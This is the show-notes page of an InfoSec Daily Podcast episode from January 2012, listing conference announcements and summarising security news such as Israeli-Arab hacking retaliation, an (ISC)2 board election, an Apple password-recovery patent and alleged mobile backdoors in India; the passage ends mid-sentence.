		<comments>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra#comments</comments>
		<pubDate>Wed, 11 Jan 2012 02:07:42 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3352</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 564 for January 10, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On &nbsp;a somewhat related note, Mubix launched a poll to see which podcasts everyone is listening to. &nbsp;Go to</span><a href="http://twtpoll.com/jlknm0"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://twtpoll.com/jlknm0</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to take the poll.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli hackers decided this past weekend to retaliate in an unorganized fashion: On an Israeli hacking forum, personal details were revealed (including phone numbers) of users from an Arab website that was hacked by an Israeli. Another column on the screen that was hidden could have been credit card details of the users. In addition, a number of other Arab sites were hacked into over the weekend, apparently by Israelis.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the meantime, Arab hackers have published a list of Israeli sites that they consider vulnerable to break-ins, and invited other hackers to hack into them. Security specialist Jacky Altel noticed this announcement on the Pastebin website. &quot;If your website URL ends with the letters .il, then your information is not protected,&quot; hackers wrote in an announcement and said that data that appeared in the announcement was their proof. &quot;All of this information was gathered in just 43 minutes from the moment that we turned on our laptop until the moment we posted it here on this site,&quot; they write.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Altel says, &quot;They published a list of sites they identified as vulnerable to attack and to being taken over remotely, and they are asking that everyone combine their knowledge as a large group in an effort to harm Israel and its systems.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://pastebin.com/itXpkzQB"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> https://www.isc2.org/PressReleaseDetails.aspx?id=8202</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Palm Harbor, Fla., U.S.A., January 11, 2012 (ISC)&#39; (ISC-squared), the worlds largest information security professional body and administrators of the CISSP&#39;, today announced the results of the election for its 2012 Board of Directors. The Board provides governance and oversight for the organization, grants certifications to qualifying candidates and enforces adherence to the (ISC) Code of Ethics.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Effective January 1, 2012, the following individuals began serving three-year terms on (ISC)s Board of Directors:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Daniel D. Houser, CISSP-ISSAP, CSSLP, senior security and identity architect for a Global 100 healthcare organization (U.S.A.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wim Remes, CISSP, manager of Information Security at Ernst &amp; Young ITRA FSO (Belgium)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prof. Jill Slay (AM), Ph.D., CISSP, Fellow of (ISC)2, dean: Research in the Division of IT, Engineering and the Environment at the University of South Australia, and professor of Forensic Computing (Australia)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Greg Thompson, CISSP, vice president and deputy CISO at Scotiabank (Canada)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Given the growing intensity of global security threats and the deepening need to fill the pipeline of cyber security professionals, the fresh, diverse perspectives and expertise of these new members will help us to address the current challenges that the cyber security professionals is are facing globally, said Freddy Tan, CISSP, acting (ISC) board chairperson. Last year, our Board made great strides, through introduction of new programs, scholarships and educational opportunities to our members and to benefit the broader digital community. We are pleased that these individuals will be joining a team of dedicated volunteers who have committed to providing their time and wisdom to representing the needs of and advancing the professionalism and competency of our members globally.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to voting in the annual Board of Director elections, (ISC)2 members are also provided with exclusive membership benefits. Throughout 2011, the organization significantly expanded its offerings to include the introduction of:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new global Chapter Program, providing members with the opportunity to build their own chapters anywhere in the world;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first annual (ISC)2 Security Congress, designed specifically for the career development needs of (ISC)2 members; and</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The (ISC)2 Foundation, a 501(c)(3) non-profit organization that drives (ISC)2s goodwill programs, such as Safe and Secure Online and the Information Security Scholarship Program.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The four newly elected professionals will join the ranks of other top information security professionals from around the world representing academia, private organizations and government agencies. Each of the Board members volunteer to provide strategic direction for the organization and are (ISC)-certified.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For a complete list of current Board members, please visit: https://www.isc2.org/board-of-directors.aspx. For information on the (ISC) Board of Directors election process, please visit https://www.isc2.org/board-election-process.aspx.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">About (ISC)2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(ISC) is the largest not-for-profit membership body of certified information security professionals worldwide, with over 80,000 members in more than 135 countries. Globally recognized as the Gold Standard, (ISC) issues the Certified Information Systems Security Professional (CISSP) and related concentrations, as well as the Certified Secure Software Lifecycle Professional (CSSLP), Certified Authorization Professional (CAP), and Systems Security Certified Practitioner (SSCP) credentials to qualifying candidates. (ISC)s certifications are among the first information technology credentials to meet the stringent requirements of ISO/IEC Standard 17024, a global benchmark for assessing and certifying personnel. (ISC) also offers education programs and services based on its CBK&#39;, a compendium of information security topics. More information is available at www.isc2.org</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.ehackingnews.com/2012/01/recover-forgotten-login-passwords-using.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ehackingnews.com/2012/01/recover-forgotten-login-passwords-using.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The New Scientist has</span><a href="http://www.newscientist.com/blogs/onepercent/2012/01/forgotten-your-password-ask-yo.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> uncovered</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a new patent from Apple that stores password recovery secrets into peripheral devices, including a power adapter. The patent aims to stop thieves of laptops, iPads and iPhones gaining unauthorised access to the portable computing devices.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The application would prompt you to plug in your specific power adapter to confirm your identity. The memory chip on your power charger could store your password secret &#8211; for instance, an encrypted version of your password reminder hint. If you&#39;ve forgotten your password you could just plug your laptop into the wall, to receive the secret password hint.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The password hint can be stored in other peripheral devices such as printer, an external monitor or a wireless router.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/india/have-rim-nokia-apple-provided-indian-military-with-backdoor-access-to-cellular-comm/838"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/india/have-rim-nokia-apple-provided-indian-military-with-backdoor-access-to-cellular-comm/838</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In exchange for mobile presence in India, RIM, Nokia and Apple have allegedly provided backdoor access for the Indian intelligence to spy on communication. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On January 6th reports of Symantec (makers of Norton Anitvirus) being hacked surfaced. The group of hackers behind the attack behind the attack were from India. In a statement issued by a member from the Lords of Dharamraja group (badass name!), the guys said:</span></p>
